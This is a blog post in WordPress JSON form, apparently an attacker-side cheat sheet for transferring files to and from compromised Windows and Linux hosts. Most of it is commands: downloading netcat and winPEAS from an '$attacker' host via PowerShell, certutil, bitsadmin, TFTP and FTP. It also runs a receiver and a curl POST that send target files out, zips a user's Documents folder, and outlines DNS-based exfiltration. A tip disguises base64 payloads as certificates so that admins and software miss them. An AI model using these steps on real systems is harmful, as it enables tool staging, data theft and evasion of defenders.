{"id":2274,"date":"2021-01-10T09:54:47","date_gmt":"2021-01-10T08:54:47","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2274"},"modified":"2024-09-04T22:05:20","modified_gmt":"2024-09-04T20:05:20","slug":"copy-files-2","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2274","title":{"rendered":"Copy files"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Important notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You have a blind code exe\u00adcu\u00adtion which does\u00adn\u2019t always works? Try to deter\u00admine if there are some bad characters.<\/li>\n\n\n\n<li>Out\u00adbound ports could be blocked as well. Try to use a port which is open for inbound traffic.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Copy+paste<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">For Lin\u00adux:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">base64 r &gt; r.b64\n...\nbase64 --decode -i r.b64 &gt; r.tar<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For Win\u00addows:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">base64 p64.exe | sed 's\/^(.*)$\/echo \\1 &gt;&gt; b64\/g'\n...\ncertutil -encode file.exe b64.txt\ncertutil -decode b64.txt file.exe<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c \"open('test.b64','wb').write(open('test.txt').read().encode('base64'))\"\n...\npython -c \"open('test.txt','wb').write(open('test.b64').read().decode('base64'))\"<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">python -m base64 -e test &gt; test.b64\n...\npython -m base64 -d test<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">PS&gt; $str=@'\nmultiline string\n'@\nPS&gt; [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($string))<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Tipp<\/strong>: Add the fol\u00adlow\u00ading at the first and last line of the b64 encod\u00aded pay\u00adload before trans\u00adfer so that it looks nicer and no soft\u00adware or admin would see it as strange&nbsp;\ud83d\ude42<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">-----BEGIN CERTIFICATE-----<br>....<br>-----END CERTIFICATE------<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Windows<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">Wget<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">powershell wget -Uri http:\/\/$attacker\/nc.exe -OutFile C:\\Windows\\Temp\\nc.exe<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Curl<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If curl is installed: Start the fol\u00adlow\u00ading Python script as <span class=\"caps\">HTTP<\/span> receiver:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>from http.server import BaseHTTPRequestHandler, HTTPServer\nimport os\n\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n    def do_POST(self):\n        content_length = int(self.headers['Content-Length'])\n        file_data = self.rfile.read(content_length)\n        file_name = self.headers['Filename']\n\n        with open(file_name, 'wb') as f:\n            f.write(file_data)\n\n        self.send_response(200)\n        self.end_headers()\n        self.wfile.write(b'File uploaded successfully')\n\n    do_PUT = do_POST\n\nserver_address = ('', 8080)\nhttpd = HTTPServer(server_address, SimpleHTTPRequestHandler)\nhttpd.serve_forever()\n<\/pre>\n\n\n\n<ol class=\"wp-block-list\">\n<li><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Then, send the file from the target:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">curl -X POST -H \"Filename: yourfile.bin\" --data-binary \"@C:\\path\\to\\yourfile.bin\" http:\/\/your-linux-server-ip:8080<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Certutil<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/file\" file<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Bitsadmin (deprecated)<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">bitsadmin \/transfer debjob \/download \/priority normal http:\/\/$NTPSRV\/beRoot.exe C:\\Temp\\beRoot.exe<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">PowerShell<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Until Win\u00addows&nbsp;7:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">(New-Object System.Net.WebClient).DownloadFile(\"http:\/\/...\", \"C:\\file.exe\")<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Above Win\u00addows&nbsp;7:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">wget http:\/\/... .outfile C:\\file.exe<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Down\u00adload in PowerShell:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">iwr -uri http:\/\/$attacker\/winPEASx64.exe -Outfile winPEAS.exe<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"caps\">TFTP<\/span><\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Start tftp ser\u00advice on anoth\u00ader host and put files into the con\u00adfig\u00adured directory.<\/li>\n\n\n\n<li>On the tar\u00adget host, down\u00adload via the com\u00admand&nbsp;line<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Start tftp dae\u00admon under&nbsp;Linux<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># mkdir \/tftp\n# atftpd --daemon --port 69 \/tftp\n# cp \/usr\/share\/windows-binaries\/nc.exe \/tftp\/<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Down\u00adload under Windows<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">tftp -i 10.11.0.5 get nc.exe<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Notepad, other programs<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">For text&nbsp;files:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"428\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04-1024x428.png\" alt class=\"wp-image-3162\" srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04-1024x428.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04-300x125.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04-768x321.png 768w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04.png 1068w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\"><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">For bina\u00adry&nbsp;files:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"574\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2021\/05\/Bildschirmfoto-2021-05-05-um-10.51.55-1024x574.png\" alt class=\"wp-image-3165\" srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/Bildschirmfoto-2021-05-05-um-10.51.55-1024x574.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/Bildschirmfoto-2021-05-05-um-10.51.55-300x168.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/Bildschirmfoto-2021-05-05-um-10.51.55-768x430.png 768w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/Bildschirmfoto-2021-05-05-um-10.51.55.png 1039w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\"><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"561\" height=\"253\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2021\/05\/Bildschirmfoto-2021-05-05-um-10.56.01.png\" alt class=\"wp-image-3167\" srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/Bildschirmfoto-2021-05-05-um-10.56.01.png 561w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/05\/Bildschirmfoto-2021-05-05-um-10.56.01-300x135.png 300w\" sizes=\"auto, (max-width: 561px) 100vw, 561px\"><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">FTP<\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If there is no inter\u00adac\u00adtive ses\u00adsion, cre\u00adate a file and use the non-inter\u00adac\u00adtive&nbsp;mode:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">User anonymous dsfuhdshdsf\nbin\nlcd C:\\Temp\nGET nc.exe\nmput *.*\nbye<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Then, exe\u00adcute the commands<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ftp -v -i -n -s:ftp.txt 10.10.10.10 [21]<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>If this does\u00adn\u2019t work, try to omit the&nbsp;port!<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple for&nbsp;WinXP<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">echo USER anonymous &gt; ftp.txt\necho dsfuhdshdsf &gt;&gt; ftp.txt\necho bin &gt;&gt; ftp.txt\necho get Taihou32.exe &gt;&gt; ftp.txt\necho bye &gt;&gt; ftp.txt\nftp -v -i -n -s:ftp.txt 192.168.119.158<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Stand-alone <span class=\"caps\">FTP<\/span> server<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">pip3 install pyftpdlib<br>python3 -m pyftpdlib -w<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">SSH<\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Try to con\u00adnect back to your <span class=\"caps\">SSH<\/span> serv\u00ader via&nbsp;scp!<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Compress files<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">With Pow\u00ader\u00adShell 5 (Win10), com\u00adpres\u00adsion is now possible<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">powershell -exec bypass\nCompress-Archive -Path C:\\Users\\alice\\Documents\\* -DestinationPath a.zip<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.7-zip.org\/a\/7za920.zip\">Or down\u00adload 7z<\/a> and use it like follow:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">7za.exe a file.7z .<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">To extract:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">7z x file.7z<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">DNS<\/span> extraction \/ infiltration<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Use a <span class=\"caps\">DNS<\/span> serv\u00ader to extract or infil\u00adtrate data from or into a network.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Infil\u00adtra\u00adtion:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Set a range of <span class=\"caps\">TXT<\/span> records of a domain you&nbsp;own.<\/li>\n\n\n\n<li>Per\u00adform queries like<br><code>nslookup -type=txt your-domain.internal<\/code><br>to \u201cimport\u201d the exter\u00adnal&nbsp;data.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Maybe use also a set of sub\u00addo\u00admains for all the data. You could also write a script which<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>base64\u2019ed a&nbsp;file<\/li>\n\n\n\n<li>cre\u00adate <span class=\"caps\">TXT<\/span> records for a domain<\/li>\n\n\n\n<li>and anoth\u00ader script, which reads like nslookup in a sequence and rebuilds the base64 information.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Impor\u00adtant notes Copy+paste For Lin\u00adux: base64 r &gt; r.b64 \u2026 base64 \u2013decode \u2011i r.b64 &gt; r.tar For Win\u00addows: base64 p64.exe | sed \u2018s\/^(.*)$\/echo \\1 \u00bb b64\/g\u2019 \u2026 cer\u00adtu\u00adtil \u2011encode file.exe b64.txt cer\u00adtu\u00adtil \u2011decode b64.txt file.exe Alter\u00adna\u00adtive: python \u2011c \u201copen(\u2018test.b64\u2019,\u2018wb\u2019).write(open(\u2018test.txt\u2019).read().encode(\u2018base64\u2019))\u201d \u2026 python \u2011c \u201copen(\u2018test.txt\u2019,\u2018wb\u2019).write(open(\u2018test.b64\u2019).read().decode(\u2018base64\u2019))\u201d Alter\u00adna\u00adtive: python \u2011m base64 \u2011e test &gt; test.b64 \u2026 python \u2011m base64&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[114],"class_list":["post-2274","post","type-post","status-publish","format-standard","hentry","category-general","tag-copy"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2274"}],"version-history":[{"count":24,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2274\/revisions"}],"predecessor-version":[{"id":4258,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2274\/revisions\/4258"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}